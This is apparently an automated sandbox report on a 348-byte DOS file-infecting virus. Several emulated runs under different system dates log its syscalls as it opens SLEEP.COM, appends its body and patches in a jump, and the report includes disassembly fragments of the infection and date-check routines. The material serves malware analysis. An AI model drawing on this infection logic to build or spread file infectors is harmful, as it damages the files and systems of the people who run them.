Sample viewer

vx.netlux.org/Virus.DOS.PS-MPC.348

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:32:18.690226803Z	26	PC: 12a72 \| Set disk transfer address
2018-12-17T22:32:18.692823433Z	78	PC: 12a7d \| Find first file
2018-12-17T22:32:18.699127317Z	67	PC: 12b8b \| Get or set file attributes
2018-12-17T22:32:18.716823693Z	61	PC: 12a89 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:18.725614208Z	63	PC: 12a95 \| Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:32:18.732772449Z	66	PC: 12a9d \| Move file pointer
2018-12-17T22:32:18.734538526Z	44	PC: 12b31 \| Get time 0x12b31: mov word ptr [bp + 0x10c], dx 0x12b35: lea di, word ptr [bp + 0x25f] 0x12b39: mov al, 0x55 0x12b3b: stosb byte ptr es:[di], al 0x12b3c: lea si, word ptr [bp + 0x103] 0x12b40: mov cx, 0x10 0x12b43: push si 0x12b44: push cx 0x12b45: rep movsb byte ptr es:[di], byte ptr [si] 0x12b47: lea si, word ptr [bp + 0x24c] 0x12b4b: mov cx, 0xd 0x12b4e: rep movsb byte ptr es:[di], byte ptr [si] 0x12b50: pop cx 0x12b51: pop si 0x12b52: pop ax 0x12b53: push di 0x12b54: push si 0x12b55: push cx 0x12b56: rep movsb byte ptr es:[di], byte ptr [si] 0x12b58: mov word ptr [bp + 0x107], ax
2018-12-17T22:32:18.737230903Z	64	PC: 12bbc \| Write file or device (Write 348 bytes on handle 5)
2018-12-17T22:32:18.7473665Z	66	PC: 12b72 \| Move file pointer
2018-12-17T22:32:18.748989293Z	64	PC: 12b7b \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:32:18.757101889Z	87	PC: 12ac6 \| Get or set file date and time
2018-12-17T22:32:18.76011958Z	62	PC: 12aca \| Close file
2018-12-17T22:32:18.767789703Z	67	PC: 12b8b \| Get or set file attributes
2018-12-17T22:32:18.777428276Z	42	PC: 12ae5 \| Get date 0x12ae5: cmp dh, 0xa 0x12ae8: jb 0x12afc 0x12aea: cmp dl, 0x17 0x12aed: jb 0x12afc 0x12aef: cmp cx, 0x7c9 0x12af3: jb 0x12afc 0x12af5: mov ah, 0x2c 0x12af7: int 0x21 0x12af9: cmp dl, 0x50 0x12afc: mov ah, 0x1a 0x12afe: mov dx, 0x80 0x12b01: int 0x21 0x12b03: ret 0x12b04: call 0x5bf41642 0x12b0a: dec bp 0x12b0b: push ax 0x12b0c: inc bx 0x12b0d: pop bp 0x12b0e: add byte ptr [bx + di + 3], bh 0x12b12: push cx
2018-12-17T22:32:18.781157155Z	26	PC: 12b03 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5777,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:55:24.815574165Z	26	PC: 12a72 \| Set disk transfer address
2018-12-25T11:55:24.817153001Z	78	PC: 12a7d \| Find first file
2018-12-25T11:55:24.821448171Z	67	PC: 12b8b \| Get or set file attributes
2018-12-25T11:55:24.840063213Z	61	PC: 12a89 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:24.848313741Z	63	PC: 12a95 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:24.856378982Z	66	PC: 12a9d \| Move file pointer
2018-12-25T11:55:24.85837991Z	44	PC: 12b31 \| Get time 0x12b31: mov word ptr [bp + 0x10c], dx 0x12b35: lea di, word ptr [bp + 0x25f] 0x12b39: mov al, 0x55 0x12b3b: stosb byte ptr es:[di], al 0x12b3c: lea si, word ptr [bp + 0x103] 0x12b40: mov cx, 0x10 0x12b43: push si 0x12b44: push cx 0x12b45: rep movsb byte ptr es:[di], byte ptr [si] 0x12b47: lea si, word ptr [bp + 0x24c] 0x12b4b: mov cx, 0xd 0x12b4e: rep movsb byte ptr es:[di], byte ptr [si] 0x12b50: pop cx 0x12b51: pop si 0x12b52: pop ax 0x12b53: push di 0x12b54: push si 0x12b55: push cx 0x12b56: rep movsb byte ptr es:[di], byte ptr [si] 0x12b58: mov word ptr [bp + 0x107], ax
2018-12-25T11:55:24.861534215Z	64	PC: 12bbc \| Write file or device (Write 348 bytes on handle 5)
2018-12-25T11:55:24.870692852Z	66	PC: 12b72 \| Move file pointer
2018-12-25T11:55:24.872199447Z	64	PC: 12b7b \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:55:24.879187859Z	87	PC: 12ac6 \| Get or set file date and time
2018-12-25T11:55:24.881260111Z	62	PC: 12aca \| Close file
2018-12-25T11:55:24.889963691Z	67	PC: 12b8b \| Get or set file attributes (See above)
2018-12-25T11:55:24.90118565Z	42	PC: 12ae5 \| Get date 0x12ae5: cmp dh, 0xa 0x12ae8: jb 0x12afc 0x12aea: cmp dl, 0x17 0x12aed: jb 0x12afc 0x12aef: cmp cx, 0x7c9 0x12af3: jb 0x12afc 0x12af5: mov ah, 0x2c 0x12af7: int 0x21 0x12af9: cmp dl, 0x50 0x12afc: mov ah, 0x1a 0x12afe: mov dx, 0x80 0x12b01: int 0x21 0x12b03: ret 0x12b04: call 0x5bf41642 0x12b0a: dec bp 0x12b0b: push ax 0x12b0c: inc bx 0x12b0d: pop bp 0x12b0e: add byte ptr [bx + di + 3], bh 0x12b12: push cx
2018-12-25T11:55:24.904306831Z	26	PC: 12b03 \| Set disk transfer address

{"DateBased":true,"Day":23,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5777,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:55:25.234861763Z	26	PC: 12a72 \| Set disk transfer address
2018-12-25T11:55:25.236028234Z	78	PC: 12a7d \| Find first file
2018-12-25T11:55:25.242887346Z	67	PC: 12b8b \| Get or set file attributes
2018-12-25T11:55:25.260693311Z	61	PC: 12a89 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:25.268125753Z	63	PC: 12a95 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:25.27660858Z	66	PC: 12a9d \| Move file pointer
2018-12-25T11:55:25.278308367Z	44	PC: 12b31 \| Get time 0x12b31: mov word ptr [bp + 0x10c], dx 0x12b35: lea di, word ptr [bp + 0x25f] 0x12b39: mov al, 0x55 0x12b3b: stosb byte ptr es:[di], al 0x12b3c: lea si, word ptr [bp + 0x103] 0x12b40: mov cx, 0x10 0x12b43: push si 0x12b44: push cx 0x12b45: rep movsb byte ptr es:[di], byte ptr [si] 0x12b47: lea si, word ptr [bp + 0x24c] 0x12b4b: mov cx, 0xd 0x12b4e: rep movsb byte ptr es:[di], byte ptr [si] 0x12b50: pop cx 0x12b51: pop si 0x12b52: pop ax 0x12b53: push di 0x12b54: push si 0x12b55: push cx 0x12b56: rep movsb byte ptr es:[di], byte ptr [si] 0x12b58: mov word ptr [bp + 0x107], ax
2018-12-25T11:55:25.281518056Z	64	PC: 12bbc \| Write file or device (Write 348 bytes on handle 5)
2018-12-25T11:55:25.291217269Z	66	PC: 12b72 \| Move file pointer
2018-12-25T11:55:25.292832673Z	64	PC: 12b7b \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:55:25.298800559Z	87	PC: 12ac6 \| Get or set file date and time
2018-12-25T11:55:25.301188328Z	62	PC: 12aca \| Close file
2018-12-25T11:55:25.311294764Z	67	PC: 12b8b \| Get or set file attributes (See above)
2018-12-25T11:55:25.323511751Z	42	PC: 12ae5 \| Get date 0x12ae5: cmp dh, 0xa 0x12ae8: jb 0x12afc 0x12aea: cmp dl, 0x17 0x12aed: jb 0x12afc 0x12aef: cmp cx, 0x7c9 0x12af3: jb 0x12afc 0x12af5: mov ah, 0x2c 0x12af7: int 0x21 0x12af9: cmp dl, 0x50 0x12afc: mov ah, 0x1a 0x12afe: mov dx, 0x80 0x12b01: int 0x21 0x12b03: ret 0x12b04: call 0x5bf41642 0x12b0a: dec bp 0x12b0b: push ax 0x12b0c: inc bx 0x12b0d: pop bp 0x12b0e: add byte ptr [bx + di + 3], bh 0x12b12: push cx
2018-12-25T11:55:25.326751381Z	26	PC: 12b03 \| Set disk transfer address

{"DateBased":true,"Day":23,"Month":10,"Year":1993,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5777,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:55:25.284427444Z	26	PC: 12a72 \| Set disk transfer address
2018-12-25T11:55:25.286112681Z	78	PC: 12a7d \| Find first file
2018-12-25T11:55:25.293229865Z	67	PC: 12b8b \| Get or set file attributes
2018-12-25T11:55:25.311984044Z	61	PC: 12a89 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:25.319188473Z	63	PC: 12a95 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:25.326507356Z	66	PC: 12a9d \| Move file pointer
2018-12-25T11:55:25.328541202Z	44	PC: 12b31 \| Get time 0x12b31: mov word ptr [bp + 0x10c], dx 0x12b35: lea di, word ptr [bp + 0x25f] 0x12b39: mov al, 0x55 0x12b3b: stosb byte ptr es:[di], al 0x12b3c: lea si, word ptr [bp + 0x103] 0x12b40: mov cx, 0x10 0x12b43: push si 0x12b44: push cx 0x12b45: rep movsb byte ptr es:[di], byte ptr [si] 0x12b47: lea si, word ptr [bp + 0x24c] 0x12b4b: mov cx, 0xd 0x12b4e: rep movsb byte ptr es:[di], byte ptr [si] 0x12b50: pop cx 0x12b51: pop si 0x12b52: pop ax 0x12b53: push di 0x12b54: push si 0x12b55: push cx 0x12b56: rep movsb byte ptr es:[di], byte ptr [si] 0x12b58: mov word ptr [bp + 0x107], ax
2018-12-25T11:55:25.331637848Z	64	PC: 12bbc \| Write file or device (Write 348 bytes on handle 5)
2018-12-25T11:55:25.341677052Z	66	PC: 12b72 \| Move file pointer
2018-12-25T11:55:25.343258919Z	64	PC: 12b7b \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:55:25.350447383Z	87	PC: 12ac6 \| Get or set file date and time
2018-12-25T11:55:25.354055217Z	62	PC: 12aca \| Close file
2018-12-25T11:55:25.363064782Z	67	PC: 12b8b \| Get or set file attributes (See above)
2018-12-25T11:55:25.3747938Z	42	PC: 12ae5 \| Get date 0x12ae5: cmp dh, 0xa 0x12ae8: jb 0x12afc 0x12aea: cmp dl, 0x17 0x12aed: jb 0x12afc 0x12aef: cmp cx, 0x7c9 0x12af3: jb 0x12afc 0x12af5: mov ah, 0x2c 0x12af7: int 0x21 0x12af9: cmp dl, 0x50 0x12afc: mov ah, 0x1a 0x12afe: mov dx, 0x80 0x12b01: int 0x21 0x12b03: ret 0x12b04: call 0x5bf41642 0x12b0a: dec bp 0x12b0b: push ax 0x12b0c: inc bx 0x12b0d: pop bp 0x12b0e: add byte ptr [bx + di + 3], bh 0x12b12: push cx
2018-12-25T11:55:25.378357115Z	44	PC: 12af9 \| Get time 0x12af9: cmp dl, 0x50 0x12afc: mov ah, 0x1a 0x12afe: mov dx, 0x80 0x12b01: int 0x21 0x12b03: ret 0x12b04: call 0x5bf41642 0x12b0a: dec bp 0x12b0b: push ax 0x12b0c: inc bx 0x12b0d: pop bp 0x12b0e: add byte ptr [bx + di + 3], bh 0x12b12: push cx 0x12b13: sub ax, cx 0x12b15: lea si, word ptr [bp + 0x2bb] 0x12b19: lea di, word ptr [bp + 0x1c4] 0x12b1d: movsw word ptr es:[di], word ptr [si] 0x12b1e: movsb byte ptr es:[di], byte ptr [si] 0x12b1f: mov byte ptr [si - 3], 0xe9 0x12b23: mov word ptr [si - 2], ax 0x12b26: add ax, 0x103
2018-12-25T11:55:25.381180958Z	26	PC: 12b03 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5777,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:55:25.860268883Z	26	PC: 12a72 \| Set disk transfer address
2018-12-25T11:55:25.862417461Z	78	PC: 12a7d \| Find first file
2018-12-25T11:55:25.869032298Z	67	PC: 12b8b \| Get or set file attributes
2018-12-25T11:55:25.886181412Z	61	PC: 12a89 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:25.894715395Z	63	PC: 12a95 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:25.902963874Z	66	PC: 12a9d \| Move file pointer
2018-12-25T11:55:25.905063277Z	44	PC: 12b31 \| Get time 0x12b31: mov word ptr [bp + 0x10c], dx 0x12b35: lea di, word ptr [bp + 0x25f] 0x12b39: mov al, 0x55 0x12b3b: stosb byte ptr es:[di], al 0x12b3c: lea si, word ptr [bp + 0x103] 0x12b40: mov cx, 0x10 0x12b43: push si 0x12b44: push cx 0x12b45: rep movsb byte ptr es:[di], byte ptr [si] 0x12b47: lea si, word ptr [bp + 0x24c] 0x12b4b: mov cx, 0xd 0x12b4e: rep movsb byte ptr es:[di], byte ptr [si] 0x12b50: pop cx 0x12b51: pop si 0x12b52: pop ax 0x12b53: push di 0x12b54: push si 0x12b55: push cx 0x12b56: rep movsb byte ptr es:[di], byte ptr [si] 0x12b58: mov word ptr [bp + 0x107], ax
2018-12-25T11:55:25.908261685Z	64	PC: 12bbc \| Write file or device (Write 348 bytes on handle 5)
2018-12-25T11:55:25.927010814Z	66	PC: 12b72 \| Move file pointer
2018-12-25T11:55:25.92969976Z	64	PC: 12b7b \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:55:25.946503896Z	87	PC: 12ac6 \| Get or set file date and time
2018-12-25T11:55:25.950455345Z	62	PC: 12aca \| Close file
2018-12-25T11:55:25.961201846Z	67	PC: 12b8b \| Get or set file attributes (See above)
2018-12-25T11:55:25.972757289Z	42	PC: 12ae5 \| Get date 0x12ae5: cmp dh, 0xa 0x12ae8: jb 0x12afc 0x12aea: cmp dl, 0x17 0x12aed: jb 0x12afc 0x12aef: cmp cx, 0x7c9 0x12af3: jb 0x12afc 0x12af5: mov ah, 0x2c 0x12af7: int 0x21 0x12af9: cmp dl, 0x50 0x12afc: mov ah, 0x1a 0x12afe: mov dx, 0x80 0x12b01: int 0x21 0x12b03: ret 0x12b04: call 0x5bf41642 0x12b0a: dec bp 0x12b0b: push ax 0x12b0c: inc bx 0x12b0d: pop bp 0x12b0e: add byte ptr [bx + di + 3], bh 0x12b12: push cx
2018-12-25T11:55:25.976294319Z	26	PC: 12b03 \| Set disk transfer address